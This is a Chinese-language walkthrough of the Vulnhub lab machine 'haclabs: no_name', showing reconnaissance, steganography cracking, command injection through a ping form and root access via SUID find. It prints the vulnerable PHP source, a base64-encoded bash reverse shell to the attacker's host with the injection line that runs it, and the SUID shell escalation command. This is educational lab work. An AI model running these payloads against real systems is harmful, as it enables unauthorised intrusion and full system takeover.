Vulnhub之Hacklabs No Name靶机详细测试过程(不同的提权方法)
Hacklabs No Name
靶机信息
名称:haclabs: no_name
地址:
https://www.vulnhub.com/entry/haclabs-no_name,429/
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ce:24:39 1 60 PCS Systemtechnik GmbH
192.168.56.151 08:00:27:7e:00:9e 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.151
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.151 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 22:18 EST
Nmap scan report for bogon (192.168.56.151)
Host is up (0.00014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:7E:00:9E (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.04 seconds
NMAP扫描结果表明目标主机有1个开放端口:80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ nikto -h http://192.168.56.151
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.151
+ Target Hostname: 192.168.56.151
+ Target Port: 80
+ Start Time: 2023-01-03 22:20:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-01-03 22:21:51 (GMT-5) (59 seconds)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ gobuster dir -u http://192.168.56.151 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.151
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/03 22:22:52 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 200) [Size: 417]
/server-status (Status: 403) [Size: 279]
Progress: 219201 / 220561 (99.38%)
===============================================================
2023/01/03 22:24:15 Finished
===============================================================
Gobuster工具扫描出/admin目录,访问该目录,为3张图片,将他们下载到Kali Linux本地,然后对图片进行分析:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ ls
haclabs.jpeg new.jpg nmap_full_scan Short.png
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ steghide extract -sf haclabs.jpeg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ stegseek haclabs.jpeg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "harder"
[i] Original filename: "imp.txt".
[i] Extracting to "haclabs.jpeg.out".
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ ls
haclabs.jpeg haclabs.jpeg.out new.jpg nmap_full_scan Short.png
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ cat haclabs.jpeg.out
c3VwZXJhZG1pbi5waHA=
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ echo 'c3VwZXJhZG1pbi5waHA=' | base64 -d
superadmin.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ steghide extract -sf new.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ stegseek new.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "lol"
[i] Original filename: "user.txt".
[i] Extracting to "new.jpg.out".
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ ls
haclabs.jpeg haclabs.jpeg.out new.jpg new.jpg.out nmap_full_scan Short.png
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ cat new.jpg.out
admin
Admin
root
admin1
msfadmin
Admin1
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ exiftool Short.png
ExifTool Version Number : 12.44
File Name : Short.png
Directory : .
File Size : 1019 kB
File Modification Date/Time : 2023:01:03 22:26:04-05:00
File Access Date/Time : 2023:01:03 22:26:04-05:00
File Inode Change Date/Time : 2023:01:03 22:26:04-05:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 5666
Image Height : 4449
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Pixels Per Unit X : 11811
Pixels Per Unit Y : 11811
Pixel Units : meters
Image Size : 5666x4449
Megapixels : 25.2
访问/superadmin.php文件,返回页面有执行ping命令的功能,看是否有命令注入漏洞:
看起来目标主机有过滤机制,需要设法绕过
发现:
8.8.8.8 | id
可以绕过过滤
8.8.8.8 | echo 'jason'
构造命令:
8.8.8.8 | more superadmin.php
返回页面源代码中有superadmin.php源代码:
<form method="post" action="">
<input type="text" placeholder="Enter an IP to ping" name="pinger">
<br>
<input type="submit" name="submitt">
</form>
<pre>::::::::::::::
superadmin.php
::::::::::::::
<form method="post" action="">
<input type="text" placeholder="Enter an IP to ping" name="pinger">
<br>
<input type="submit" name="submitt">
</form>
<?php
if (isset($_POST['submitt']))
{
$word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
$pinged=$_POST['pinger'];
$newStr = str_replace($word, "", $pinged);
if(strcmp($pinged, $newStr) == 0)
{
$flag=1;
}
else
{
$flag=0;
}
}
if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>
</pre>
当了解目标主机的过滤机制以后,接下来就简单了,看如何规避过滤机制,要点就是用base64编码:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ echo "bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'" | base64
YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjE0Ni81NTU1IDA+JjEnCg==
然后在/superadmin.php中输入:
8.8.8.8 | echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjE0Ni81NTU1IDA+JjEnCg== | base64 -d | bash
这样在Kali Linux上成功得到了目标主机反弹回来的shell
──(kali㉿kali)-[~/Desktop/Vulnhub/HL]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.151] 51898
bash: cannot set terminal process group (866): Inappropriate ioctl for device
bash: no job control in this shell
www-data@haclabs:/var/www/html$
提权
将linpeas.sh脚本上传目标主机的/tmp目录,修改权限,并执行脚本,在输出结果中知道find命令有SUID位,因此可以用来提权:
www-data@haclabs:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
ls -alh
total 40K
drwx------ 6 root root 4.0K Feb 15 2020 .
drwxr-xr-x 24 root root 4.0K Jan 30 2020 ..
-rw------- 1 root root 5 Feb 15 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Jan 30 2020 .cache
drwx------ 5 root root 4.0K Jan 30 2020 .config
drwx------ 3 root root 4.0K Jan 27 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Jan 27 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 97 Jan 30 2020 flag3.txt
cat flag3.txt
Congrats!!!You completed the challenege!
() ()
\ /
----------
STRIVE FOR PROGRESS,NOT FOR PERFECTION
